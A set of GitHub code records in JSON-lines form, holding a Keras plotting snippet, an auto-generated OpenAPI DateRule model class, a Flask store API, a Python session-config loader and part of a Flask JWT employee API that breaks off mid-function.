plt\n\nplt.plot(acc, steps, 'bo', label = 'train acc')\nplt.plot(val_acc, steps, 'b', label = 'val acc')\nplt.legend()\n\nplt.figure()\nplt.plot(loss,steps, 'bo', label = 'train loss')\nplt.plot(val_loss,'b', label = 'val loss' )\nplt.legend()\n\nplt.show()\n","repo_name":"AndreasGerono/Keras_DLwP","sub_path":"conv_dogs_cats.py","file_name":"conv_dogs_cats.py","file_ext":"py","file_size_in_byte":4632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"6331387040","text":"# coding: utf-8\n\n\"\"\"\n Apteco API\n\n An API to allow access to Apteco Marketing Suite resources # noqa: E501\n\n The version of the OpenAPI document: v2\n Contact: support@apteco.com\n Generated by: https://openapi-generator.tech\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\nfrom apteco_api.configuration import Configuration\n\n\nclass DateRule(object):\n \"\"\"NOTE: This class is auto generated by OpenAPI Generator.\n Ref: https://openapi-generator.tech\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n openapi_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n openapi_types = {\n 'pattern_frequency': 'str',\n 'pattern_interval': 'int',\n 'pattern_type': 'str',\n 'pattern_days_of_week': 'list[str]',\n 'pattern_day_of_month': 'int',\n 'pattern_month_of_year': 'int',\n 'pattern_occurrence_of_day_in_month': 'str',\n 'start_range_limit': 'str',\n 'range_start_date': 'datetime',\n 'start_range_relative': 'str',\n 'start_range_offset_direction': 'str',\n 'start_range_offset': 'int',\n 'start_range_offset_units': 'str',\n 'end_range_limit': 'str',\n 'range_end_date': 'datetime',\n 'end_range_relative': 'str',\n 'end_range_offset_direction': 'str',\n 'end_range_offset': 'int',\n 'end_range_offset_units': 'str',\n 'range_max_occurrences': 'int'\n }\n\n attribute_map = {\n 'pattern_frequency': 'patternFrequency',\n 'pattern_interval': 'patternInterval',\n 'pattern_type': 'patternType',\n 'pattern_days_of_week': 'patternDaysOfWeek',\n 'pattern_day_of_month': 'patternDayOfMonth',\n 'pattern_month_of_year': 'patternMonthOfYear',\n 'pattern_occurrence_of_day_in_month': 'patternOccurrenceOfDayInMonth',\n 'start_range_limit': 'startRangeLimit',\n 'range_start_date': 'rangeStartDate',\n 'start_range_relative': 'startRangeRelative',\n 'start_range_offset_direction': 'startRangeOffsetDirection',\n 'start_range_offset': 'startRangeOffset',\n 'start_range_offset_units': 'startRangeOffsetUnits',\n 'end_range_limit': 'endRangeLimit',\n 'range_end_date': 'rangeEndDate',\n 'end_range_relative': 'endRangeRelative',\n 'end_range_offset_direction': 'endRangeOffsetDirection',\n 'end_range_offset': 'endRangeOffset',\n 'end_range_offset_units': 'endRangeOffsetUnits',\n 'range_max_occurrences': 'rangeMaxOccurrences'\n }\n\n def __init__(self, pattern_frequency=None, pattern_interval=None, pattern_type=None, pattern_days_of_week=None, pattern_day_of_month=None, pattern_month_of_year=None, pattern_occurrence_of_day_in_month=None, start_range_limit=None, range_start_date=None, start_range_relative=None, start_range_offset_direction=None, start_range_offset=None, start_range_offset_units=None, end_range_limit=None, range_end_date=None, end_range_relative=None, end_range_offset_direction=None, end_range_offset=None, end_range_offset_units=None, range_max_occurrences=None, local_vars_configuration=None): # noqa: E501\n \"\"\"DateRule - a model defined in OpenAPI\"\"\" # noqa: E501\n if local_vars_configuration is None:\n local_vars_configuration = Configuration()\n self.local_vars_configuration = local_vars_configuration\n\n self._pattern_frequency = None\n self._pattern_interval = None\n self._pattern_type = None\n self._pattern_days_of_week = None\n self._pattern_day_of_month = None\n self._pattern_month_of_year = None\n self._pattern_occurrence_of_day_in_month = None\n self._start_range_limit = None\n self._range_start_date = None\n self._start_range_relative = None\n self._start_range_offset_direction = None\n self._start_range_offset = None\n self._start_range_offset_units = None\n self._end_range_limit = None\n self._range_end_date = None\n self._end_range_relative = None\n self._end_range_offset_direction = None\n self._end_range_offset = None\n self._end_range_offset_units = None\n self._range_max_occurrences = None\n self.discriminator = None\n\n if pattern_frequency is not None:\n self.pattern_frequency = pattern_frequency\n if pattern_interval is not None:\n self.pattern_interval = pattern_interval\n if pattern_type is not None:\n self.pattern_type = pattern_type\n if pattern_days_of_week is not None:\n self.pattern_days_of_week = pattern_days_of_week\n if pattern_day_of_month is not None:\n self.pattern_day_of_month = pattern_day_of_month\n if pattern_month_of_year is not None:\n self.pattern_month_of_year = pattern_month_of_year\n if pattern_occurrence_of_day_in_month is not None:\n self.pattern_occurrence_of_day_in_month = pattern_occurrence_of_day_in_month\n if start_range_limit is not None:\n self.start_range_limit = start_range_limit\n if range_start_date is not None:\n self.range_start_date = range_start_date\n if start_range_relative is not None:\n self.start_range_relative = start_range_relative\n if start_range_offset_direction is not None:\n self.start_range_offset_direction = start_range_offset_direction\n if start_range_offset is not None:\n self.start_range_offset = start_range_offset\n if start_range_offset_units is not None:\n self.start_range_offset_units = start_range_offset_units\n if end_range_limit is not None:\n self.end_range_limit = end_range_limit\n if range_end_date is not None:\n self.range_end_date = range_end_date\n if end_range_relative is not None:\n self.end_range_relative = end_range_relative\n if end_range_offset_direction is not None:\n self.end_range_offset_direction = end_range_offset_direction\n if end_range_offset is not None:\n self.end_range_offset = end_range_offset\n if end_range_offset_units is not None:\n self.end_range_offset_units = end_range_offset_units\n if range_max_occurrences is not None:\n self.range_max_occurrences = range_max_occurrences\n\n @property\n def pattern_frequency(self):\n \"\"\"Gets the pattern_frequency of this DateRule. # noqa: E501\n\n\n :return: The pattern_frequency of this DateRule. # noqa: E501\n :rtype: str\n \"\"\"\n return self._pattern_frequency\n\n @pattern_frequency.setter\n def pattern_frequency(self, pattern_frequency):\n \"\"\"Sets the pattern_frequency of this DateRule.\n\n\n :param pattern_frequency: The pattern_frequency of this DateRule. # noqa: E501\n :type: str\n \"\"\"\n allowed_values = [\"Daily\", \"Weekly\", \"Monthly\", \"Yearly\"] # noqa: E501\n if self.local_vars_configuration.client_side_validation and pattern_frequency not in allowed_values: # noqa: E501\n raise ValueError(\n \"Invalid value for `pattern_frequency` ({0}), must be one of {1}\" # noqa: E501\n .format(pattern_frequency, allowed_values)\n )\n\n self._pattern_frequency = pattern_frequency\n\n @property\n def pattern_interval(self):\n \"\"\"Gets the pattern_interval of this DateRule. # noqa: E501\n\n\n :return: The pattern_interval of this DateRule. # noqa: E501\n :rtype: int\n \"\"\"\n return self._pattern_interval\n\n @pattern_interval.setter\n def pattern_interval(self, pattern_interval):\n \"\"\"Sets the pattern_interval of this DateRule.\n\n\n :param pattern_interval: The pattern_interval of this DateRule. # noqa: E501\n :type: int\n \"\"\"\n\n self._pattern_interval = pattern_interval\n\n @property\n def pattern_type(self):\n \"\"\"Gets the pattern_type of this DateRule. # noqa: E501\n\n\n :return: The pattern_type of this DateRule. # noqa: E501\n :rtype: str\n \"\"\"\n return self._pattern_type\n\n @pattern_type.setter\n def pattern_type(self, pattern_type):\n \"\"\"Sets the pattern_type of this DateRule.\n\n\n :param pattern_type: The pattern_type of this DateRule. # noqa: E501\n :type: str\n \"\"\"\n allowed_values = [\"CalculatedDay\", \"CalculatedMonth\", \"CalculatedYear\", \"Explicit\"] # noqa: E501\n if self.local_vars_configuration.client_side_validation and pattern_type not in allowed_values: # noqa: E501\n raise ValueError(\n \"Invalid value for `pattern_type` ({0}), must be one of {1}\" # noqa: E501\n .format(pattern_type, allowed_values)\n )\n\n self._pattern_type = pattern_type\n\n @property\n def pattern_days_of_week(self):\n \"\"\"Gets the pattern_days_of_week of this DateRule. # noqa: E501\n\n\n :return: The pattern_days_of_week of this DateRule. # noqa: E501\n :rtype: list[str]\n \"\"\"\n return self._pattern_days_of_week\n\n @pattern_days_of_week.setter\n def pattern_days_of_week(self, pattern_days_of_week):\n \"\"\"Sets the pattern_days_of_week of this DateRule.\n\n\n :param pattern_days_of_week: The pattern_days_of_week of this DateRule. # noqa: E501\n :type: list[str]\n \"\"\"\n allowed_values = [\"None\", \"All\", \"AllWeekdays\", \"AllWeekendDays\", \"Sunday\", \"Monday\", \"Tuesday\", \"Wednesday\", \"Thursday\", \"Friday\", \"Saturday\"] # noqa: E501\n if (self.local_vars_configuration.client_side_validation and\n not set(pattern_days_of_week).issubset(set(allowed_values))): # noqa: E501\n raise ValueError(\n \"Invalid values for `pattern_days_of_week` [{0}], must be a subset of [{1}]\" # noqa: E501\n .format(\", \".join(map(str, set(pattern_days_of_week) - set(allowed_values))), # noqa: E501\n \", \".join(map(str, allowed_values)))\n )\n\n self._pattern_days_of_week = pattern_days_of_week\n\n @property\n def pattern_day_of_month(self):\n \"\"\"Gets the pattern_day_of_month of this DateRule. # noqa: E501\n\n\n :return: The pattern_day_of_month of this DateRule. # noqa: E501\n :rtype: int\n \"\"\"\n return self._pattern_day_of_month\n\n @pattern_day_of_month.setter\n def pattern_day_of_month(self, pattern_day_of_month):\n \"\"\"Sets the pattern_day_of_month of this DateRule.\n\n\n :param pattern_day_of_month: The pattern_day_of_month of this DateRule. # noqa: E501\n :type: int\n \"\"\"\n\n self._pattern_day_of_month = pattern_day_of_month\n\n @property\n def pattern_month_of_year(self):\n \"\"\"Gets the pattern_month_of_year of this DateRule. # noqa: E501\n\n\n :return: The pattern_month_of_year of this DateRule. # noqa: E501\n :rtype: int\n \"\"\"\n return self._pattern_month_of_year\n\n @pattern_month_of_year.setter\n def pattern_month_of_year(self, pattern_month_of_year):\n \"\"\"Sets the pattern_month_of_year of this DateRule.\n\n\n :param pattern_month_of_year: The pattern_month_of_year of this DateRule. # noqa: E501\n :type: int\n \"\"\"\n\n self._pattern_month_of_year = pattern_month_of_year\n\n @property\n def pattern_occurrence_of_day_in_month(self):\n \"\"\"Gets the pattern_occurrence_of_day_in_month of this DateRule. # noqa: E501\n\n\n :return: The pattern_occurrence_of_day_in_month of this DateRule. # noqa: E501\n :rtype: str\n \"\"\"\n return self._pattern_occurrence_of_day_in_month\n\n @pattern_occurrence_of_day_in_month.setter\n def pattern_occurrence_of_day_in_month(self, pattern_occurrence_of_day_in_month):\n \"\"\"Sets the pattern_occurrence_of_day_in_month of this DateRule.\n\n\n :param pattern_occurrence_of_day_in_month: The pattern_occurrence_of_day_in_month of this DateRule. # noqa: E501\n :type: str\n \"\"\"\n allowed_values = [\"None\", \"First\", \"Second\", \"Third\", \"Fourth\", \"Last\"] # noqa: E501\n if self.local_vars_configuration.client_side_validation and pattern_occurrence_of_day_in_month not in allowed_values: # noqa: E501\n raise ValueError(\n \"Invalid value for `pattern_occurrence_of_day_in_month` ({0}), must be one of {1}\" # noqa: E501\n .format(pattern_occurrence_of_day_in_month, allowed_values)\n )\n\n self._pattern_occurrence_of_day_in_month = pattern_occurrence_of_day_in_month\n\n @property\n def start_range_limit(self):\n \"\"\"Gets the start_range_limit of this DateRule. # noqa: E501\n\n\n :return: The start_range_limit of this DateRule. # noqa: E501\n :rtype: str\n \"\"\"\n return self._start_range_limit\n\n @start_range_limit.setter\n def start_range_limit(self, start_range_limit):\n \"\"\"Sets the start_range_limit of this DateRule.\n\n\n :param start_range_limit: The start_range_limit of this DateRule. # noqa: E501\n :type: str\n \"\"\"\n allowed_values = [\"Earliest\", \"Latest\", \"Actual\", \"Relative\"] # noqa: E501\n if self.local_vars_configuration.client_side_validation and start_range_limit not in allowed_values: # noqa: E501\n raise ValueError(\n \"Invalid value for `start_range_limit` ({0}), must be one of {1}\" # noqa: E501\n .format(start_range_limit, allowed_values)\n )\n\n self._start_range_limit = start_range_limit\n\n @property\n def range_start_date(self):\n \"\"\"Gets the range_start_date of this DateRule. # noqa: E501\n\n\n :return: The range_start_date of this DateRule. # noqa: E501\n :rtype: datetime\n \"\"\"\n return self._range_start_date\n\n @range_start_date.setter\n def range_start_date(self, range_start_date):\n \"\"\"Sets the range_start_date of this DateRule.\n\n\n :param range_start_date: The range_start_date of this DateRule. # noqa: E501\n :type: datetime\n \"\"\"\n\n self._range_start_date = range_start_date\n\n @property\n def start_range_relative(self):\n \"\"\"Gets the start_range_relative of this DateRule. # noqa: E501\n\n\n :return: The start_range_relative of this DateRule. # noqa: E501\n :rtype: str\n \"\"\"\n return self._start_range_relative\n\n @start_range_relative.setter\n def start_range_relative(self, start_range_relative):\n \"\"\"Sets the start_range_relative of this DateRule.\n\n\n :param start_range_relative: The start_range_relative of this DateRule. # noqa: E501\n :type: str\n \"\"\"\n allowed_values = [\"Today\", \"Tomorrow\", \"Yesterday\", \"ThisWeek\", \"ThisMonth\", \"ThisQuarter\", \"ThisYear\", \"ThisBusinessMonth\", \"ThisBusinessQuarter\", \"ThisBusinessYear\", \"LoadDate\", \"LoadWeek\", \"LoadMonth\", \"LoadQuarter\", \"LoadYear\", \"FirstPopulatedDate\", \"FirstPopulatedWeek\", \"FirstPopulatedMonth\", \"FirstPopulatedQuarter\", \"FirstPopulatedYear\", \"LastPopulatedDate\", \"LastPopulatedWeek\", \"LastPopulatedMonth\", \"LastPopulatedQuarter\", \"LastPopulatedYear\", \"CustomDate\"] # noqa: E501\n if self.local_vars_configuration.client_side_validation and start_range_relative not in allowed_values: # noqa: E501\n raise ValueError(\n \"Invalid value for `start_range_relative` ({0}), must be one of {1}\" # noqa: E501\n .format(start_range_relative, allowed_values)\n )\n\n self._start_range_relative = start_range_relative\n\n @property\n def start_range_offset_direction(self):\n \"\"\"Gets the start_range_offset_direction of this DateRule. # noqa: E501\n\n\n :return: The start_range_offset_direction of this DateRule. # noqa: E501\n :rtype: str\n \"\"\"\n return self._start_range_offset_direction\n\n @start_range_offset_direction.setter\n def start_range_offset_direction(self, start_range_offset_direction):\n \"\"\"Sets the start_range_offset_direction of this DateRule.\n\n\n :param start_range_offset_direction: The start_range_offset_direction of this DateRule. # noqa: E501\n :type: str\n \"\"\"\n allowed_values = [\"Forward\", \"Backward\"] # noqa: E501\n if self.local_vars_configuration.client_side_validation and start_range_offset_direction not in allowed_values: # noqa: E501\n raise ValueError(\n \"Invalid value for `start_range_offset_direction` ({0}), must be one of {1}\" # noqa: E501\n .format(start_range_offset_direction, allowed_values)\n )\n\n self._start_range_offset_direction = start_range_offset_direction\n\n @property\n def start_range_offset(self):\n \"\"\"Gets the start_range_offset of this DateRule. # noqa: E501\n\n\n :return: The start_range_offset of this DateRule. # noqa: E501\n :rtype: int\n \"\"\"\n return self._start_range_offset\n\n @start_range_offset.setter\n def start_range_offset(self, start_range_offset):\n \"\"\"Sets the start_range_offset of this DateRule.\n\n\n :param start_range_offset: The start_range_offset of this DateRule. # noqa: E501\n :type: int\n \"\"\"\n\n self._start_range_offset = start_range_offset\n\n @property\n def start_range_offset_units(self):\n \"\"\"Gets the start_range_offset_units of this DateRule. # noqa: E501\n\n\n :return: The start_range_offset_units of this DateRule. # noqa: E501\n :rtype: str\n \"\"\"\n return self._start_range_offset_units\n\n @start_range_offset_units.setter\n def start_range_offset_units(self, start_range_offset_units):\n \"\"\"Sets the start_range_offset_units of this DateRule.\n\n\n :param start_range_offset_units: The start_range_offset_units of this DateRule. # noqa: E501\n :type: str\n \"\"\"\n allowed_values = [\"Days\", \"Weeks\", \"Months\", \"Quarters\", \"Years\"] # noqa: E501\n if self.local_vars_configuration.client_side_validation and start_range_offset_units not in allowed_values: # noqa: E501\n raise ValueError(\n \"Invalid value for `start_range_offset_units` ({0}), must be one of {1}\" # noqa: E501\n .format(start_range_offset_units, allowed_values)\n )\n\n self._start_range_offset_units = start_range_offset_units\n\n @property\n def end_range_limit(self):\n \"\"\"Gets the end_range_limit of this DateRule. # noqa: E501\n\n\n :return: The end_range_limit of this DateRule. # noqa: E501\n :rtype: str\n \"\"\"\n return self._end_range_limit\n\n @end_range_limit.setter\n def end_range_limit(self, end_range_limit):\n \"\"\"Sets the end_range_limit of this DateRule.\n\n\n :param end_range_limit: The end_range_limit of this DateRule. # noqa: E501\n :type: str\n \"\"\"\n allowed_values = [\"Earliest\", \"Latest\", \"Actual\", \"Forward\", \"Backward\", \"Relative\"] # noqa: E501\n if self.local_vars_configuration.client_side_validation and end_range_limit not in allowed_values: # noqa: E501\n raise ValueError(\n \"Invalid value for `end_range_limit` ({0}), must be one of {1}\" # noqa: E501\n .format(end_range_limit, allowed_values)\n )\n\n self._end_range_limit = end_range_limit\n\n @property\n def range_end_date(self):\n \"\"\"Gets the range_end_date of this DateRule. # noqa: E501\n\n\n :return: The range_end_date of this DateRule. # noqa: E501\n :rtype: datetime\n \"\"\"\n return self._range_end_date\n\n @range_end_date.setter\n def range_end_date(self, range_end_date):\n \"\"\"Sets the range_end_date of this DateRule.\n\n\n :param range_end_date: The range_end_date of this DateRule. # noqa: E501\n :type: datetime\n \"\"\"\n\n self._range_end_date = range_end_date\n\n @property\n def end_range_relative(self):\n \"\"\"Gets the end_range_relative of this DateRule. # noqa: E501\n\n\n :return: The end_range_relative of this DateRule. # noqa: E501\n :rtype: str\n \"\"\"\n return self._end_range_relative\n\n @end_range_relative.setter\n def end_range_relative(self, end_range_relative):\n \"\"\"Sets the end_range_relative of this DateRule.\n\n\n :param end_range_relative: The end_range_relative of this DateRule. # noqa: E501\n :type: str\n \"\"\"\n allowed_values = [\"Today\", \"Tomorrow\", \"Yesterday\", \"ThisWeek\", \"ThisMonth\", \"ThisQuarter\", \"ThisYear\", \"ThisBusinessMonth\", \"ThisBusinessQuarter\", \"ThisBusinessYear\", \"LoadDate\", \"LoadWeek\", \"LoadMonth\", \"LoadQuarter\", \"LoadYear\", \"FirstPopulatedDate\", \"FirstPopulatedWeek\", \"FirstPopulatedMonth\", \"FirstPopulatedQuarter\", \"FirstPopulatedYear\", \"LastPopulatedDate\", \"LastPopulatedWeek\", \"LastPopulatedMonth\", \"LastPopulatedQuarter\", \"LastPopulatedYear\", \"CustomDate\"] # noqa: E501\n if self.local_vars_configuration.client_side_validation and end_range_relative not in allowed_values: # noqa: E501\n raise ValueError(\n \"Invalid value for `end_range_relative` ({0}), must be one of {1}\" # noqa: E501\n .format(end_range_relative, allowed_values)\n )\n\n self._end_range_relative = end_range_relative\n\n @property\n def end_range_offset_direction(self):\n \"\"\"Gets the end_range_offset_direction of this DateRule. # noqa: E501\n\n\n :return: The end_range_offset_direction of this DateRule. # noqa: E501\n :rtype: str\n \"\"\"\n return self._end_range_offset_direction\n\n @end_range_offset_direction.setter\n def end_range_offset_direction(self, end_range_offset_direction):\n \"\"\"Sets the end_range_offset_direction of this DateRule.\n\n\n :param end_range_offset_direction: The end_range_offset_direction of this DateRule. # noqa: E501\n :type: str\n \"\"\"\n allowed_values = [\"Forward\", \"Backward\"] # noqa: E501\n if self.local_vars_configuration.client_side_validation and end_range_offset_direction not in allowed_values: # noqa: E501\n raise ValueError(\n \"Invalid value for `end_range_offset_direction` ({0}), must be one of {1}\" # noqa: E501\n .format(end_range_offset_direction, allowed_values)\n )\n\n self._end_range_offset_direction = end_range_offset_direction\n\n @property\n def end_range_offset(self):\n \"\"\"Gets the end_range_offset of this DateRule. # noqa: E501\n\n\n :return: The end_range_offset of this DateRule. # noqa: E501\n :rtype: int\n \"\"\"\n return self._end_range_offset\n\n @end_range_offset.setter\n def end_range_offset(self, end_range_offset):\n \"\"\"Sets the end_range_offset of this DateRule.\n\n\n :param end_range_offset: The end_range_offset of this DateRule. # noqa: E501\n :type: int\n \"\"\"\n\n self._end_range_offset = end_range_offset\n\n @property\n def end_range_offset_units(self):\n \"\"\"Gets the end_range_offset_units of this DateRule. # noqa: E501\n\n\n :return: The end_range_offset_units of this DateRule. # noqa: E501\n :rtype: str\n \"\"\"\n return self._end_range_offset_units\n\n @end_range_offset_units.setter\n def end_range_offset_units(self, end_range_offset_units):\n \"\"\"Sets the end_range_offset_units of this DateRule.\n\n\n :param end_range_offset_units: The end_range_offset_units of this DateRule. # noqa: E501\n :type: str\n \"\"\"\n allowed_values = [\"Days\", \"Weeks\", \"Months\", \"Quarters\", \"Years\"] # noqa: E501\n if self.local_vars_configuration.client_side_validation and end_range_offset_units not in allowed_values: # noqa: E501\n raise ValueError(\n \"Invalid value for `end_range_offset_units` ({0}), must be one of {1}\" # noqa: E501\n .format(end_range_offset_units, allowed_values)\n )\n\n self._end_range_offset_units = end_range_offset_units\n\n @property\n def range_max_occurrences(self):\n \"\"\"Gets the range_max_occurrences of this DateRule. # noqa: E501\n\n\n :return: The range_max_occurrences of this DateRule. # noqa: E501\n :rtype: int\n \"\"\"\n return self._range_max_occurrences\n\n @range_max_occurrences.setter\n def range_max_occurrences(self, range_max_occurrences):\n \"\"\"Sets the range_max_occurrences of this DateRule.\n\n\n :param range_max_occurrences: The range_max_occurrences of this DateRule. # noqa: E501\n :type: int\n \"\"\"\n\n self._range_max_occurrences = range_max_occurrences\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.openapi_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, DateRule):\n return False\n\n return self.to_dict() == other.to_dict()\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n if not isinstance(other, DateRule):\n return True\n\n return self.to_dict() != other.to_dict()\n","repo_name":"Apteco/apteco-api","sub_path":"pkg/apteco_api/models/date_rule.py","file_name":"date_rule.py","file_ext":"py","file_size_in_byte":26245,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"17636098500","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nfrom flask import Flask, jsonify, request\n\n# __name__ gives each file a unique name.\n# app is a new object of Flask class\napp = Flask(__name__)\n\n# tell the app what requests it'll\n# understand. Use decorators\n# http://google.com/\n\n# / : means root page or home page or an endpoint\n# simply a forward slash means home page\n\n\nstores = [\n\n {\n 'name': 'Store_1',\n 'items': [\n {\n 'name': 'lemon',\n 'price': '20'\n },\n {\n 'name': 'orange',\n 'price': '40'\n }\n\n ]\n\n },\n {\n 'name': 'Store_2',\n 'items': [\n {\n 'name': 'apple',\n 'price': '10'\n },\n {\n 'name': 'banana',\n 'price': '60'\n }\n\n ]\n }\n]\n\n\n@app.route('/')\ndef home():\n return 'Hello world!'\n\n\n@app.route('/store')\ndef get_stores():\n return jsonify({'stores': stores})\n\n\n@app.route('/store', methods=['POST'])\ndef create_store():\n request_data = request.get_json()\n new_data = {\n 'name': request_data['name'],\n 'items': []\n }\n stores.append(new_data)\n return jsonify(stores)\n\n\n@app.route('/store/')\ndef get_store(name):\n for x in stores:\n if x['name'] == name:\n return jsonify(x)\n return jsonify({'message': 'not found!'})\n\n\n@app.route('/store//item', methods=['POST'])\ndef create_item_in_store(name):\n request_data = request.get_json\n for store in stores:\n if store['name'] == name:\n new_item = {\n 'name': request_data['name'],\n 'price': request_data['price']\n }\n store['items'].append(new_item)\n return jsonify(store['items'])\n\n\n@app.route('/store//item')\ndef get_items_in_store(name):\n for store in stores:\n if store['name'] == name:\n return jsonify(store['items'])\n return 'not found'\n\n\n# http://localhost:5000/store/getSI/?a=Store_2&b=apple\n@app.route('/store/getSI/', methods=['GET'])\ndef getSI():\n for store in stores:\n if store['name'] == request.args.get('a'):\n for item in store['items']:\n if item['name'] == request.args.get('b'):\n return item['price']\n return 'store not found'\n\n\napp.run(port=5000)\n","repo_name":"aadityamenon29/Python-Flask-Udemy","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20787987641","text":"#!/usr/bin/env python\n\nimport ConfigParser, io, logging, os\n\n# blank items will be filled in later (in set_session)\nCFGDEFAULTS = \"\"\"\n[filesystem]\nrawrepo: /data/raw\ndatarepo: /data/raw\ntmp: /scratch/tmp\nscratch: /scratch\nresultsrepo: /data/results\ncleanup: True\natlas: /atlas\n\n[clustering]\noptions:\nnjobs: 8\nnadjacent: 0\n\n[pixel clock]\nthreshold: 0.03\nrefractory: 44\nmincodetime: 441\ny: -28\nheight: 8.5\nscreenh: 64.54842055808264\nsepratio: 0.2\nminmatch: 10\nmaxerr: 0\nregex: pixel_clock([0-9])#[0-9]+\\.wav\n\n[audio]\nsamprate: 44100\nregex: input_([0-9])#[0-9]+\\.wav\n\n[mworks]\next: .h5\nfile: \n\n[epochs]\ntimeunit: mworks\nsettletime: 300\n\n[session]\nname: \ndir: \nscratch: \noutput: \noutputprefix: \n\n[probe]\nid: \noffset: \n\n[gdata]\nprobeid: tFAlHPctqL5YNf1oocFPLgA\nprobews: od6\nnotebookid: tHR87keGRC4XIZlX6uWi-vA\nnotebookws: od6\nemail:\npassword:\n\"\"\"\n\ndef load(session, customCfgFile = None):\n config = Config()\n config.read_user_config()\n config.read_session_config(session)\n config.set_session(session)\n if not customCfgFile is None: config.read(customCfgFile)\n return config\n\nclass Config(ConfigParser.SafeConfigParser):\n def __init__(self, *args, **kwargs):\n ConfigParser.SafeConfigParser.__init__(self, *args, **kwargs)\n # read in defaults\n self.readfp(io.BytesIO(CFGDEFAULTS))\n \n def read_user_config(self, homeDir=os.getenv('HOME')):\n filename = '/'.join((homeDir,'.physio'))\n if os.path.exists(filename):\n logging.debug(\"Found user cfg: %s\" % filename)\n self.read(filename)\n else:\n logging.warning('No user cfg found: %s' % filename)\n \n def read_session_config(self, session):\n filename = '/'.join((self.get('filesystem','datarepo'),session,'physio.ini'))\n if os.path.exists(filename):\n logging.debug(\"Found session cfg: %s\" % filename)\n self.read(filename)\n else:\n logging.warning('No session cfg found: %s' % filename)\n \n def set_session(self, session):\n self.set('session','name',session)\n \n if self.get('session','dir').strip() == '':\n self.set('session','dir','/'.join((self.get('filesystem','datarepo'),session)))\n \n if self.get('session','outputprefix').strip() == '':\n self.set('session','outputprefix','/'.join((self.get('filesystem','resultsrepo'),session)))\n \n if self.get('session','scratch').strip() == '':\n self.set('session','scratch','/'.join((self.get('filesystem','scratch'),session)))\n \n if self.get('mworks','file').strip() == '':\n self.set('mworks','file','/'.join((self.get('session','dir'),session + self.get('mworks','ext'))))\n \n # if self.get('pixel clock','scratch').strip() == '':\n # self.set('pixel clock','scratch','/'.join((self.get('session','scratch'),'pixel_clock')))\n \n def set_epoch(self, audioTimerange):\n epochDir = \"%s/%i_%i\" % (self.get('session','outputprefix'), int(audioTimerange[0]), int(audioTimerange[1]))\n self.set('session','output',epochDir)\n","repo_name":"coxlab/physiology_analysis","sub_path":"physio/cfg.py","file_name":"cfg.py","file_ext":"py","file_size_in_byte":3109,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"20585188625","text":"from flask import jsonify, request\nfrom employee_api import app, db, jwt\nfrom flask_jwt_extended import create_access_token, current_user,jwt_required\nfrom .models import User, Employee, EmployeeSchema\n\n\n\n\n#This first two function helps in returning user object(from the database) so that i can make use of the current_user to access any authenticated user\n\n@jwt.user_identity_loader\ndef user_identity_lookup(user):\n\treturn user.id\n\n@jwt.user_lookup_loader\ndef user_lookup_callback(_jwt_header, jwt_data):\n\tidentity = jwt_data['sub']\n\treturn User.query.filter_by(id=identity).one_or_none()\n\n\n\n\n\n\n\n\n@app.route('/api/v1/')\ndef welcome_message():\n\treturn jsonify('It works'), 200\n\t\n\t\n@app.route('/api/v1/user/signup', methods=['POST'])\ndef user_signup():\n\ttry:\n\t\tdata = request.get_json()\n\t\tif User.query.filter_by(email=data['email']).first():\n\t\t\t#checks if email already exists and if email entered is valid(checks this through regex)\n\t\t\treturn jsonify({'status':'failed','msg':'Email already exist'}), 400\n\t\tpassword = User.hash_password(data['password']) #hashes password to sha256 hash\n\t\tnew_user = User(email=data['email'],password=password)\n\t\tnew_user.create_user() # add user to database\n\t\treturn jsonify({'status':'success','msg':'Account created successfully'}), 201\n\texcept Exception as e:\n\t\tprint(e)\n\t\treturn jsonify({'status':'failed','msg':'Input is invalid'}), 422\n\t\t\n\t\t\n@app.route('/api/v1/user/login', methods=['POST'])\ndef user_login():\n\ttry:\n\t\tdata = request.get_json()\n\t\tuser = User.query.filter_by(email=data['email']).first()\n\t\tif user and User.verify_password(data['password'],user.password):\n\t\t\taccess_token = create_access_token(identity=user) #creates jwt tokens\n\t\t\treturn jsonify({'status':'success','msg':'Login successfully','access_token':access_token}), 200\n\t\treturn jsonify({'status':'failed','msg':'Invalid username or password'}), 403\n\texcept Exception as e:\n\t\tprint(e)\n\t\treturn jsonify({'status':'failed','msg':'Input is invalid'}), 422\n\t\n\t\t\n@app.route('/api/v1/employee', methods=['POST'])\n@jwt_required()\ndef add_employee():\n\ttry:\n\t\tdata = request.get_json()\n\t\temployee = Employee(first_name=data['first_name'],last_name=data['last_name'],\n\t\tage=data['age'], added_by=current_user)\n\t\temployee.create_employee()\n\t\treturn jsonify({'status':'success','msg':'Employee added successfully'}), 201\n\texcept Exception as e:\n\t\tprint(e)\n\t\treturn jsonify({'status':'failed','msg':'Invalid input or required data is missing'}), 422\n\t\t\n\t\t\n\n@app.route('/api/v1/employees', methods=['GET'])\n@jwt_required()\ndef get_employees():\n\ttry:\n\t\temployees = Employee.query.all()\n\t\tschema = 